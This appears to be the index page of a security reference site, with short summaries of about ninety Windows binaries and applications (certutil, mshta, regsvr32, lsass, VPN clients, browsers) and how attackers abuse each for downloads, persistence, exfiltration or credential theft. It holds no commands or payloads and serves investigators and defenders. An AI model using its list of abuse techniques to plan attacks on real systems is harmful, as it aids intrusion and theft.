Loading...
Security analysis and investigation guides for system files
EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vector**. Attackers abuse Excel via **malicious macros ...
Everything is a fast file search utility by Voidtools. Attackers may use it for rapid file discovery and reconnaissance to locate sensitive data on co...
ExpressVPN is a commercial VPN service client. While legitimate for privacy, it can be abused for C2 communications, bypassing network controls, and m...
HitmanPro is a portable anti-malware scanner from Sophos. It uses cloud-based behavioral analysis to detect threats. Legitimate security tool that cou...
Kodi is an open-source media center application. While primarily for entertainment, malicious add-ons can be used as attack vectors for malware distri...
MoUsoCoreWorker.exe is a Windows Update Orchestrator component that manages update operations. Legitimate system process that may be impersonated or c...
MpCmdRun.exe is the **Windows Defender command-line interface**. While legitimate for scanning and management, attackers abuse it as a **LOLBin to dow...
MsMpEng.exe is the **Windows Defender Antimalware Service Executable**, the core engine of Windows Security. It runs with **SYSTEM privileges** and is...
NordVPN is a commercial VPN client offering encrypted tunneling. Can be abused for evading network controls, C2 tunneling, and data exfiltration.
OBS Studio is open-source broadcasting and recording software. While legitimate, attackers may abuse it for screen recording, credential capture, and ...
OUTLOOK.EXE is **Microsoft Outlook email client**. It is a **primary phishing delivery vector** where malicious attachments and links arrive. Attacker...
OneDrive.exe is the **Microsoft OneDrive cloud sync client**. Attackers abuse OneDrive for **data exfiltration** over trusted channels, **malware dist...
OpenVPN is a popular open-source VPN client that provides secure tunneling. Adversaries abuse it for data exfiltration, C2 tunneling, and bypassing ne...
PDF24 is a PDF creation and manipulation tool with virtual printer functionality. Generally low risk, but PDF tools can be involved in document manipu...
Process Hacker is an advanced process monitoring tool. While legitimate for system administration, it is frequently abused by attackers to terminate s...
ProtonVPN is a privacy-focused VPN from Proton AG. Offers Secure Core routing and strong encryption. Can be abused for C2, exfiltration, and evading s...
RuntimeBroker.exe manages **permissions for Windows Store (UWP) apps**. It runs in user context and is common on Windows 10/11 systems. While less com...
Screenpresso is a screenshot and screen recording tool. While legitimate, it can be abused for surveillance, credential capture via screenshots, and c...
SearchIndexer.exe is the **Windows Search indexing service** that indexes files for fast search. It has access to read files across the system, making...
Skype.exe is the **Microsoft Skype** communication client. Attackers target Skype for **credential theft**, **malware distribution** via file sharing,...
Spotify.exe is the **Spotify music streaming** desktop client. As an Electron-based application, it may be targeted for **credential theft** or used a...
Autoruns is a Sysinternals tool for viewing and managing Windows startup programs. Legitimate diagnostic tool that can be used by attackers for persis...
Sysmon.exe (System Monitor) is a **Microsoft Sysinternals** tool providing detailed logging of process creation, network connections, file changes, an...
VLC is a popular open-source media player. Has been exploited via malicious media files and can potentially be used for screen recording or covert str...
SearchFilterHost.exe is a Windows Search component that hosts filter handlers for content indexing. Has had historical vulnerabilities and may be impe...
SearchProtocolHost.exe is a Windows Search component that handles protocol handlers for accessing data sources. May be impersonated by malware.
SearchApp.exe is the Windows 10/11 Start menu search and Cortana component. Legitimate Windows process that may be impersonated by malware or targeted...
SearchHost.exe hosts the Windows 11 search user interface. It replaced SearchApp.exe in Windows 11 as the primary search UI component.
SecurityHealthService.exe is a Windows component that monitors system security health and provides the Windows Security Center functionality. Attacker...
WireGuard is a modern, high-performance VPN protocol. Its simplicity and speed make it attractive for both legitimate use and potential abuse for C2 a...
alg.exe (Application Layer Gateway Service) provides support for **third-party protocol plug-ins** for Internet Connection Sharing (ICS) and Windows F...
bitsadmin.exe is the **Background Intelligent Transfer Service** command-line tool and a **notorious LOLBin**. Attackers abuse it for **stealthy file ...
brave.exe is the **Brave Browser**, a privacy-focused Chromium-based browser with built-in ad blocking and crypto wallet features. As a Chromium deriv...
certutil.exe is a Windows **certificate management utility** and one of the most **notorious LOLBins** (Living-off-the-Land Binaries). Attackers abuse...
chrome.exe is the **Google Chrome web browser**, the most widely-used browser globally. Chrome's extensive feature set makes it a **high-value target*...
cmd.exe is the **Windows Command Interpreter** providing command-line access to the operating system. It is a **critical LOLBin** heavily abused for e...
cmstp.exe (Microsoft Connection Manager Profile Installer) is a Windows utility for installing connection profiles. It is a **dangerous LOLBin** that ...
conhost.exe (Console Host) provides the graphical interface for console applications (cmd.exe, PowerShell). One instance runs per console window. Malw...
csrss.exe (Client/Server Runtime Subsystem) is a **critical Windows system process** responsible for console windows, thread creation/deletion, and Wi...
ctfmon.exe (CTF Loader) manages the **Alternative User Input Text Input Processor (TIP)** and Microsoft Office Language Bar. It handles text services ...
curl.exe is a **command-line URL transfer tool** now built into Windows 10/11. It is increasingly used by attackers for **malware downloads**, **data ...
discord.exe is the **Discord communication platform** client, widely used for gaming and communities. Attackers abuse Discord's **CDN for malware host...
dism.exe (Deployment Image Servicing and Management) is a Windows utility for **servicing Windows images**. Attackers abuse DISM to **enable disabled ...
dllhost.exe (COM Surrogate) hosts COM objects out-of-process. Multiple instances are normal. Malware may inject into dllhost.exe or masquerade as it.
dropbox.exe is the **Dropbox cloud storage client** for file synchronization. Attackers abuse Dropbox for **data exfiltration** over trusted channels,...
dwm.exe (Desktop Window Manager) is a critical Windows process responsible for **visual effects**, window compositing, and the Aero interface. Running...
explorer.exe is the **Windows Shell** providing the desktop, taskbar, Start menu, and file browsing. It runs once per user session and is the parent o...
firefox.exe is the **Mozilla Firefox web browser**, a popular open-source browser. Attackers target Firefox for **credential theft** from stored passw...
fontdrvhost.exe (Usermode Font Driver Host) handles **font rendering** in user mode rather than kernel mode for improved security. Font parsing has hi...
iexplore.exe is **Microsoft Internet Explorer**, a legacy browser officially retired but still present on Windows systems. IE's **legacy COM interface...
java.exe is the **Java Runtime Environment** launcher, executing Java applications on Windows. Java has a **notorious security history** with many cri...
keepass.exe is the **KeePass password manager**, storing credentials in encrypted databases. As a **high-value target**, attackers attempt to steal Ke...
lsass.exe (Local Security Authority Subsystem Service) is the core Windows authentication process that stores user credentials in memory. It's the #1 ...
makecab.exe is a Windows utility for **creating cabinet (.cab) archive files**. It can be abused as a **LOLBin for data compression** before exfiltrat...
mbam.exe is the **Malwarebytes Anti-Malware** executable. Malwarebytes is a popular security tool for malware detection and removal. Attackers may att...
mdm.exe (Machine Debug Manager) enables **script debugging** in web browsers and Microsoft Office applications. It is part of Visual Studio debugging ...
msedge.exe is **Microsoft Edge**, the default Chromium-based browser on Windows 10/11. As the successor to Internet Explorer, Edge inherits the same t...
mshta.exe executes HTML Applications (.HTA files). It is a **critical LOLBin** abused for executing remote payloads, bypassing application controls, a...
msiexec.exe is the **Windows Installer** executable for installing, modifying, and removing MSI packages. It is a **potent LOLBin** that can **execute...
mstsc.exe is the **Microsoft Remote Desktop Connection** client for RDP sessions. It is heavily used by attackers for **lateral movement** after gaini...
net.exe is a Windows utility for managing **users, groups, shares, and services**. Attackers use net.exe extensively for **reconnaissance** (net user,...
netsh.exe (Network Shell) configures **Windows network settings**. Attackers abuse netsh for **firewall rule manipulation**, **port forwarding** (prox...
node.exe is the **Node.js JavaScript runtime**. Attackers abuse Node.js for **script-based attacks**, **C2 frameworks**, and leveraging npm packages f...
notepad.exe is the **Windows text editor**, a ubiquitous and trusted application. While typically benign, attackers use notepad.exe as a **process inj...
ntoskrnl.exe is the **Windows NT operating system kernel**, the core of Windows responsible for process management, memory management, and hardware ab...
powershell.exe is the **Windows PowerShell** scripting engine. It is the **#1 attack tool** used by threat actors for execution, download cradles, pos...
procexp.exe (Process Explorer) is a **Sysinternals advanced process viewer**. While a legitimate diagnostic tool, attackers may use it for **reconnais...
python.exe is the **Python programming language interpreter**. Attackers abuse Python for **script-based attacks**, running obfuscated malware, and le...
reg.exe is the Windows **Registry command-line editor** for querying and modifying the registry. Attackers use reg.exe extensively for **persistence**...
regsvr32.exe registers COM DLLs. It is a **LOLBin** abused for executing remote scripts via the /s /n /u /i switches ("Squiblydoo" technique), bypassi...
rundll32.exe is a Windows utility for executing DLL functions from the command line. It is one of the **most frequently abused Living-off-the-Land Bin...
sc.exe is the **Windows Service Control Manager** command-line tool. Attackers heavily abuse sc.exe to **create malicious services for persistence**, ...
schtasks.exe is the Windows **Task Scheduler command-line** interface. It is a **primary persistence mechanism** used by attackers to schedule malicio...
services.exe is the **Windows Service Control Manager (SCM)**, responsible for starting, stopping, and managing all Windows services. It runs as NT AU...
slack.exe is the **Slack workplace communication** desktop client. Attackers target Slack for **token theft**, **data exfiltration** via webhooks, and...
smartscreen.exe is the **Windows SmartScreen Filter** that protects against malicious downloads and websites. Attackers actively try to **bypass or di...
smss.exe (Session Manager Subsystem) is the **first user-mode process** started by the Windows kernel during boot. It initializes the Windows subsyste...
spoolsv.exe is the Windows Print Spooler service. It has been exploited by **PrintNightmare (CVE-2021-34527)** and other critical vulnerabilities allo...
steam.exe is the **Steam gaming platform client** by Valve. Attackers target Steam for **account theft**, **game item fraud**, and **malware distribut...
svchost.exe is the legitimate Windows Service Host that hosts services implemented as DLLs. Multiple instances (10-50+) are normal on modern Windows. ...
taskeng.exe (Vista/7) and taskhostw.exe (8+) execute scheduled tasks. **Scheduled tasks are a top persistence mechanism**. Monitor Event ID 4698 for t...
tasklist.exe displays **running processes** on local or remote systems. Attackers use tasklist for **security software detection**, **process reconnai...
whoami.exe displays **current user and privilege information**. While simple, it is a **universal reconnaissance command** run by nearly every attacke...
winlogon.exe is the **Windows Logon Application**, responsible for managing user authentication, Ctrl+Alt+Del handling, and user profile loading. It i...
wmic.exe is the **WMI command-line interface** providing access to Windows Management Instrumentation. It is a **powerful LOLBin** used for **remote c...
wmiprvse.exe (WMI Provider Host) executes WMI queries and hosts WMI providers. It is abused for **lateral movement, persistence via event subscription...
wscript.exe (Windows Script Host) executes **VBScript and JScript** files. It is one of the **most abused Windows components** for malware delivery vi...
wuauclt.exe (Windows Update AutoUpdate Client) manages **Windows Update operations** including checking for updates and downloading patches. It is a *...
wudfhost.exe (Windows User-mode Driver Framework Host) hosts **user-mode device drivers** that run outside the kernel for improved stability. It manag...